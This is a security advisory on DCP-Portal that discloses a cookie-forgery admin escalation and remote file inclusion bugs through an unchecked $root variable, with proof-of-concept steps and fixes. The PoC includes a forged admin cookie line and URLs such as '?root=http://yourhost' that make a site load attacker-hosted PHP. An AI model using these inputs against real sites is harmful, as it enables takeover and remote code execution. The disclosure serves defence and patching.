I. BACKGROUND

   DCP is a .php program designed to run portals. It have forums,
   news system, accounts etc. More information about DCP can be
   found on http://www.dcp-portal.org

II. DESCRIPTION

  a) privilege escalation vulnerability
  
     Any user can become admin simply by setting appropriate cookie.
     The vulnerability exists in all .php files in admin directory.
     Even in admin/index.php file:
     
     [ admin/index.php ]
     ----------------------------------------------------------------
     	 <?
	 include ("../config.inc.php");
	 if ($HTTP_COOKIE_VARS["dcp5_member_admin"] <= 0) {
	    header("Location: ../index.php");
	    exit();
	 }
	 include ("$root/admin/inc/header.inc.php");
	 
     [ ... ]
     ----------------------------------------------------------------

     DCP have five admin levels. Fifth level have all privileges. An
     attacker with 'normal' account can simply set dcp5_member_admin 
     cookie to value '5' to escalate his privileges. This works for
     all admin/*.php files, but admin/index.php is main admin panel so
     using it is most comfortable.

  b) script injection vulnerabilities
  
     There are few script injection vulnerabilities in dcp-portal.
     
     [ library/editor/editor.php ]
     ----------------------------------------------------------------
     
         <?
	 $url_path_editor = "$root_url/library/editor/";
	 $abs_path_editor = "$root/library/editor/";
	 
	 [ ... ]
	 
	 if( !isset($insertat_editor) ){
	     include $abs_path_editor."PropAcce_string.php";
	 }	     
     
     [ ... ]
     ----------------------------------------------------------------     

     An attacker can set $root value to any value she wants. She can even
     set root=http://evilhost to include 
     http://evilhost/library/editor/PropAcce_string.php file.



     [ library/lib.php ]
     ----------------------------------------------------------------
         <?
	 // Include libraries
	 include ("$root/library/lib_nav.php");
	 include ("$root/library/lib_mods.php");
	 include ("$root/library/lib_admin.php");
	 include ("$root/library/lib_3rd.php");

     [ ... ]
     ----------------------------------------------------------------

     This vulnerability is similar to previous. Attacker can set $root
     variable to any she wants, causing including malicious files.
     



III. ANALYSIS

   An malicious attacker can use these vulnerabilities to gain admin access
to dcp portal, add/remove users, read users informations, add/remove news,
forums etc. She can use script injection to gain remote access to machine
with apache user privileges (normaly nobody). 



IV. DETECTION

  All versions of dcp-portal are vulnerable. All vulns was tested on version 
  5.2 SE, on Linux.  



V. PROOF OF CONCEPT

  a) privilege escalation vulnerability 
  
     I've set such line in my mozilla's cookies.txt file:
     
     	  localhost     FALSE           FALSE   never   dcp5_member_admin       5
     
     After setting cookie I've logged in. The "admin" link appeared in my
     menu. I could use http://localhost/admin/index.php administrator panel
     to do anythink other admins could.
     
  b) script injection vulnerabilities 
  
     [ library/editor/editor.php vuln: ]
     
        On remote machine reate library/editor/PropAcce_string.php file with
        such contents:	
	     <? echo "<?echo(\"hacked\");?>"; ?>	     
        Then use this request to exploit vulnerability:	
	     http://vuln_host/library/editor/editor.php?root=http://yourhost	
	You'll see "hacked" on requested page.
	
     [ library/lib.php vuln: ]
     
        On remote machine create library/lib_nav.php file with such contents:	
	     <? echo "<?echo(\"hacked\");?>; ?>	     
	Use this link to exploit vulnerability:	
	     http://vuln_host/library/lib.php?root=http://yourhost
     	You'll see "hacked on requested page.
     
VI. SOLUTION

  a) privilege escalation vulnerability
  
     dcp-portal saves all users information in sql table. It should check
     if username and password match these from sql database and if admin 
     field of this user is >=1. If it is, the admin access should be granted.
     
 
  b) script injection vulnerabilities

     In both vulnerable files (library/editor/editor.php and library/lib.php)
     config.inc.php file should be included at the beginning:
     
     - in editor.php:     include("../../config.inc.php");
     - in lib.php:        include("../config.inc.php");
     
Grzegorz Aksamit <mcbethh@op.pl>